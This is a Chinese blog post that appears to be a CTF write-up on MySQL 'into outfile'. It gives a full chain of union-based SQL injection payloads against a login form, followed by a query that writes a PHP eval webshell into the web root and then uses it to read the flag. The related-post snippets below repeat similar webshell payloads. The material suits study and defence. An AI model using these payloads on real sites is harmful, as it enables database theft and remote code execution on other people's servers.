【into outfile写文件】

于 2024-10-19 17:40:23 发布
阅读量385 收藏
点赞数 1
分类专栏: CTF 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45131319/article/details/143079250
版权

简介

请添加图片描述

select * from user into outfile 'C:/Users/ichunqiu/Desktop/PhpStudy2018/PHPTutorial/WWW/1.txt';

用法的意思就是把user表中查询到的所有字段都导出到1.txt文件中

我们之前还有学到dumpfile,单是它只能导出一条数据

请添加图片描述

写入shell

请添加图片描述

测试注入点
username=admin&password=a

闭合
username=admin' and 1=1%23&password=a

测试列数
username=admin' order by 3%23&password=a

测试回显位
username=a' union select 1,2,3%23&password=a

查库名
username=a' union select 1,database(),3%23&password=a

查表名
username=a' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23&password=a

查列名
username=a' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23&password=a

查flag
username=a' union select 1,flag,3 from flag%23&password=a

Flag提示了一个路径,使用load_file读取

username=a' union select 1,load_file('C:/phpstudy_pro/WWW/7/7/flag.txt'),3 %23&password=a

提示hacker 过滤了load_file
不能用load_file读文件,现在就可以利用into outfile 来写入一个webshell,然后拿到flag

写入webshell
select "<?php eval($_POST['shell']);?>" into outfile 'C:/phpstudy_pro/WWW/shell.php';

post
shell=phpinfo();
成功执行phpinfo

拿flag
shell=readfile('flag.txt');

利用文件包含

请添加图片描述

sqli-labs Less-7 Dump into outfile sql注入读文件
bigblue00的博客
06-16 1847
Less-7 Dump into outfile sql注入读文件 SQL语句只要正确就会输出 You are in … 错误就会输出You have an error in your SQL syntax 本例主要练习SQL注入读文件 1、先了解一个语句: into outfile 语句用于把表数据导出到一个文本文件中 要想mysql用户对文件进行导入导出,首先要看指定的权限目录 mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE,
select into outfile问题一则
woqutechteam的博客
10-11 1410
01 背景 select into outfile无论对于开发或DBA来说,都是一个爱不释手的导出数据的方式。相比mysqldump,它能够对需要导出的字段做限制,很好的满足了某些不需要导出主键字段的场景或分库分表的环境下数据的重新导入。且与load data infile配合起来,无疑是一款数据导入导出的利器。最近,开发小伙伴在测试环境使用select into file进行数据导出时,碰...
SQL注入——into outfile的使用
weixin_54217950的博客
02-16 5306
数据库into outfile语句把表数据导出到一个文本文件中,那么利用这个语句,再配合满足的‘三个条件’,即可实现文件或者一句话木马导入到数据库文件的目录中。 三个条件: 1.具有root权限。 2.在数据库配置文件中的 配置项含有:secure_file_priv=''。(注意在数据库中此项默认为secure_file_priv=null)。 3.知道数据库的绝对路径。 注意:由于满足条件十分苛刻,所以很难实现。 例子 导入文件命令:http://127.0.0.1/sqli-labs-maste
MySQL使用SELECTI...INTO OUTFILE导出表数据
Itmastergo的博客
05-24 4420
通过对数据表的导入导出,可以实现 MySQL 数据库服务器与其它数据库服务器间移动数据。导出是指将 MySQL 数据表的数据复制到文本文件。数据导出的方式有多种,下面主要介绍使用 SELECTI...INTO OUTFILE 语句导出数据。
sql注入之into outfile
ljj20020718的博客
11-25 3047
sql注入之into outfile
sql注入之into outfile语句写入一句话木马_sql的into outfile
最新发布
2401_83739411的博客
04-12 760
into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出;
sql语句利用into outfile写入一句话
Blue_Starry的博客
03-04 6966
利用需要的条件有: 1、对web目录需要有权限能够使用单引号 2、知道绝对路径 3、没有配置-secure-file-priv 当知道路径时,可以直接用?id=1 union select "&lt;?php @eval($_POST['123']);?&gt;" into outfile("C:/phpStudy/WWW/a.php") 或者采用PHPmyadmin,选择一个数据库如...
用SELECT… INTO OUTFILE语句导出MySQL数据的教程
12-15
在MySQL中,SELECT… INTO OUTFILE语句是一个非常实用的功能,用于将查询结果直接导出到服务器主机上的文件。这个语句将数据以特定的格式保存,方便进行数据备份、迁移或者进一步处理。以下是关于使用SELECT… INTO ...
用SELECT... INTO OUTFILE语句导出MySQL数据的教程
09-10
INTO OUTFILE`语句是MySQL提供的一种便捷方式,允许用户将查询结果直接导出到服务器主机上的文本文件。这个功能对于数据库管理员和数据分析师来说非常实用,因为它简化了数据提取的过程。 使用`SELECT... INTO ...
mysql导出数据select..into outfile..(导出目录、文件格式)
龟的小号的博客
01-24 6895
文章目录步骤1:查看my.ini文件中secure-file-priv的值步骤2:导出数据步骤3:指定文件格式步骤4:取消导出目录限制 步骤1:查看my.ini文件中secure-file-priv的值 mysql对数据导出的目录做了限制,默认导出默认必须和secure-file-priv一致。 所以,mysql默认导出目录就是 C:/ProgramData/MySQL/MySQL Serve...
【Less-7】into outfile写入webshell
ssrf
10-28 720
目录一、测试注入点二、判断字段数三、into outfile写入webshell 一、测试注入点 源码: $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Us
Mysql写入webshell两种方法总结-- into outfile,导入日志
qq_45730325的博客
05-19 4227
Mysql写入webshell
mysql outfile 文件已存在_MySQL OUTFILE查询抱怨“文件已存在”,但该文件根本不存在...
weixin_39710106的博客
01-19 488
我正在编一个非常简单的shell脚本来将表转储到CSV文件中.以下是其中的一部分:day=`/bin/date +'%Y-%m-%d'`file="/tmp/table-$day.csv"rm $filequery="SELECT * FROM table INTO OUTFILE '$file' FIELDS TERMINATED BY ',' ENCLOSED BY '\"' LINES T...
mysql注入 outfile_sql注入之文件写入into outfile
weixin_30698775的博客
02-02 2205
sql注入中写入webshell的几种方式sql注入中写入webshell的几种方式secure_file_priv="c:/…"被注释掉或者是web路径php.ini中的get_magic_quotes_gpc()函数未开启其中secure_file_priv有三种情况空,表示导入导出没有任何限制有指定路径,比如("c:/xxx/xxx"):只能向指定路径导入导出文件null,禁止导入导出在进行...
mysql 开发进阶篇系列 49 表的数据导出(into outfile,mysqldump)
weixin_43394129的博客
10-15 624
一.概述   在数据库的日常维护中,表的导入和导出是很频繁的操作,本篇讲解如何使用导入功能,并以案例为演示。某些情况下,需要将表里的数据导出为某些符号分割的纯数据文本,而不是sql语句,比如:(1)用来作为excel显示。 (2)节省备份空间。(3)为了快速的加载数据,load data的加载速度比普通的sql加载要快20倍以上。为了满足这些应用,可以使用以下两种办法来实现。   1. 方法1...
sql注入系列课程
10-14
本课程是sql注入系列课程,从最基础的sql注入语法讲起,里面包含常见数据库sql注入方法,及各种类型的sql注入,通过sql注入直接获取服务器权限等攻击方法及演示。
mysql into outfile语法,MySQL开发进阶篇 表的数据导出(into outfile,mysqldump)
weixin_42504327的博客
03-17 4975
一.概述在数据库的日常维护中,表的导入和导出是很频繁的操作,本篇讲解如何使用导入功能,并以案例为演示。某些情况下,需要将表里的数据导出为某些符号分割的纯数据文本,而不是sql语句,比如:(1)用来作为excel显示。 (2)节省备份空间。(3)为了快速的加载数据,load data的加载速度比普通的sql加载要快20倍以上。为了满足这些应用,可以使用以下两种办法来实现。1. 方法1 into o...
MySQL select into outfile用法
热门推荐
var_dz的博客
08-15 3万+
在使用mysql的into outfile命令将数据库数据导出为csv、excel时,发现数据可以导出,但是列名却没有,但是却可以通过修改sql语句的方法加上表头,具体实现方法是在查找数据的时候并上列名: 不带表头 select uid,nickname,realname,mobile,idcard from m order by m.uid desc into outfile '/var/...
select into outfile的sql语句
weixin_30919235的博客
05-02 1283
SELECT INTOOUTFILE语句把表数据导出到一个文本文件中,并用LOAD DATA …INFILE语句恢复数据。但是这种方法只能导出或导入数据的内容,不包括表的结构,如果表的结构文件损坏,则必须先恢复原来的表的结构。 一、SELECT INTOOUTFILE语法: select * from Table into outfile '/路径/文件名'fie...
MySQL into outfile怎么导出文件
05-24
使用MySQL的 `INTO OUTFILE` 命令可以将查询结果导出到一个文件中。下面是一个简单的例子: ``` SELECT col1, col2, col3 INTO OUTFILE '/path/to/output/file' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY '\n' FROM mytable; ``` 其中,`col1`、`col2`、`col3` 是要导出的列名,`/path/to/output/file` 是导出的文件路径和文件名,`FIELDS TERMINATED BY` 指定列之间的分隔符,`OPTIONALLY ENCLOSED BY` 指定每个列是否需要被引号包裹,`LINES TERMINATED BY` 指定行分隔符。 注意,执行该命令时,MySQL服务器必须有写入导出文件的权限。如果文件不存在,MySQL会尝试创建该文件,但如果目录不存在,则会导致错误。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值